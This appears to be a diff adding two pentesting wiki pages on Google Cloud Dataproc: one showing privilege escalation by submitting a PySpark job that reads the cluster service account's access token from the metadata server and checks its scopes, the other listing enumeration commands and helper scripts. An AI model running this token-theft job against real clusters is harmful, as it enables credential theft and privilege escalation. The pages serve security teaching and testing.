Original file line number Diff line number Diff line change
@@ -0,0 +1,56 @@
# GCP Dataproc Privilege Escalation

{{#include ../../../banners/hacktricks-training.md}}

## Dataproc

{{#ref}}
../gcp-services/gcp-dataproc-enum.md
{{#endref}}

### `dataproc.clusters.get`, `dataproc.clusters.use`, `dataproc.jobs.create`, `dataproc.jobs.get`, `dataproc.jobs.list`, `storage.objects.create`, `storage.objects.get`

I was unable to get a reverse shell with this method. However, a job submitted to the cluster can query the metadata endpoint and leak the access token of the service account (SA) attached to the cluster VMs, as described below.

#### Steps to exploit

- Upload the job script to a Cloud Storage bucket.

- Submit the script as a job to a Dataproc cluster.

- Have the job query the metadata server from inside the cluster.

- Leak the access token of the service account used by the cluster.

```python
import requests

# The "metadata" hostname resolves to the metadata server from inside the cluster VMs
metadata_url = "http://metadata/computeMetadata/v1/instance/service-accounts/default/token"
# The metadata server rejects requests that lack this header
headers = {"Metadata-Flavor": "Google"}

def fetch_metadata_token():
    try:
        response = requests.get(metadata_url, headers=headers, timeout=5)
        response.raise_for_status()
        token = response.json().get("access_token", "")
        # The job's driver output is returned to whoever submitted the job
        print(f"Leaked Token: {token}")
        return token
    except Exception as e:
        print(f"Error fetching metadata token: {e}")
        return None

if __name__ == "__main__":
    fetch_metadata_token()
```

```bash
# Copy the script to the storage bucket
gsutil cp <python-script> gs://<bucket-name>/<python-script>

# Submit the malicious job
gcloud dataproc jobs submit pyspark gs://<bucket-name>/<python-script> \
--cluster=<cluster-name> \
--region=<region>
```
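Once the token appears in the job output, it can be useful to check which OAuth scopes it carries. The following is a minimal sketch, not part of the original technique: it assumes the leaked token is passed to Google's public `tokeninfo` endpoint, and the helper names (`build_tokeninfo_url`, `parse_scopes`, `inspect_token`) are hypothetical.

```python
import json
import urllib.parse
import urllib.request

# Assumption: Google's OAuth2 tokeninfo endpoint is used to inspect the token
TOKENINFO_URL = "https://oauth2.googleapis.com/tokeninfo"

def build_tokeninfo_url(access_token):
    """Build the tokeninfo URL for a given access token."""
    query = urllib.parse.urlencode({"access_token": access_token})
    return f"{TOKENINFO_URL}?{query}"

def parse_scopes(tokeninfo):
    """Return the scopes from a tokeninfo response as a list."""
    # The "scope" field is a space-separated string
    return tokeninfo.get("scope", "").split()

def inspect_token(access_token):
    """Query tokeninfo and return the decoded JSON response."""
    with urllib.request.urlopen(build_tokeninfo_url(access_token), timeout=5) as resp:
        return json.load(resp)

if __name__ == "__main__":
    info = inspect_token("<leaked-token>")  # placeholder, replace with the leaked value
    print(parse_scopes(info))
```

A token scoped to `https://www.googleapis.com/auth/cloud-platform` is limited only by the IAM roles granted to the service account.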

{{#include ../../../banners/hacktricks-training.md}}
@@ -0,0 +1,47 @@
# GCP - Dataproc Enum

{{#include ../../../banners/hacktricks-training.md}}

## Basic Information

Google Cloud Dataproc is a fully managed service for running Apache Spark, Apache Hadoop, Apache Flink, and other big data frameworks. It is primarily used for data processing, querying, machine learning, and stream analytics. Dataproc enables organizations to create clusters for distributed computing with ease, integrating seamlessly with other Google Cloud Platform (GCP) services like Cloud Storage, BigQuery, and Cloud Monitoring.

Dataproc clusters run on virtual machines (VMs), and the service account associated with these VMs determines the permissions and access level of the cluster.

## Components

A Dataproc cluster typically includes:

- Master Node: Manages cluster resources and coordinates distributed tasks.

- Worker Nodes: Execute distributed tasks.

- Service Accounts: Handle API calls and access other GCP services.

## Enumeration

Dataproc clusters, jobs, and configurations can be enumerated to gather sensitive information, such as service accounts, permissions, and potential misconfigurations.

### Cluster Enumeration

To enumerate Dataproc clusters and retrieve their details:

```bash
gcloud dataproc clusters list --region=<region>
gcloud dataproc clusters describe <cluster-name> --region=<region>
```
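Since the service account attached to the cluster VMs determines what a job can reach, it helps to pull that field out of the cluster listing. The sketch below assumes the JSON layout of the Dataproc cluster resource (`config.gceClusterConfig.serviceAccount` and `serviceAccountScopes`) and that a missing `serviceAccount` field means the Compute Engine default service account is in use. The function names are hypothetical.

```python
import json
import subprocess

def extract_service_account(cluster):
    """Summarize the service account settings of one cluster resource (a dict)."""
    gce = cluster.get("config", {}).get("gceClusterConfig", {})
    return {
        "cluster": cluster.get("clusterName"),
        # Assumption: an absent field means the Compute Engine default SA is used
        "service_account": gce.get("serviceAccount", "<Compute Engine default>"),
        "scopes": gce.get("serviceAccountScopes", []),
    }

def list_clusters(region):
    """Run gcloud and return the clusters in a region as a list of dicts."""
    result = subprocess.run(
        ["gcloud", "dataproc", "clusters", "list", f"--region={region}", "--format=json"],
        check=True, capture_output=True, text=True,
    )
    return json.loads(result.stdout)

if __name__ == "__main__":
    for cluster in list_clusters("<region>"):  # placeholder region
        print(extract_service_account(cluster))
```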

### Job Enumeration

```bash
gcloud dataproc jobs list --region=<region>
gcloud dataproc jobs describe <job-id> --region=<region>
```
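Job descriptions can reveal script locations, arguments, and the target cluster. As a rough sketch, the function below condenses one job (as returned by `gcloud dataproc jobs describe <job-id> --region=<region> --format=json`) into the fields most relevant during enumeration. It assumes the field names of the Dataproc job resource (`reference.jobId`, `placement.clusterName`, `status.state`, and a type-specific block such as `pysparkJob`); `summarize_job` is a hypothetical helper.

```python
def summarize_job(job):
    """Condense a Dataproc job resource (a dict) into key enumeration fields."""
    # The type-specific block is named e.g. "pysparkJob", "sparkJob", "hadoopJob"
    job_type = next((key for key in job if key.endswith("Job")), None)
    details = job.get(job_type, {}) if job_type else {}
    # Main entry point, e.g. "mainPythonFileUri" or "mainJarFileUri", when present
    main = next((value for key, value in details.items() if key.startswith("main")), None)
    return {
        "id": job.get("reference", {}).get("jobId"),
        "cluster": job.get("placement", {}).get("clusterName"),
        "state": job.get("status", {}).get("state"),
        "type": job_type,
        "main": main,
        "args": details.get("args", []),
    }
```

Script URIs point to buckets worth inspecting, and job arguments occasionally contain secrets passed on the command line.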

### Privesc

{{#ref}}
../gcp-privilege-escalation/gcp-dataproc-privesc.md
{{#endref}}

{{#include ../../../banners/hacktricks-training.md}}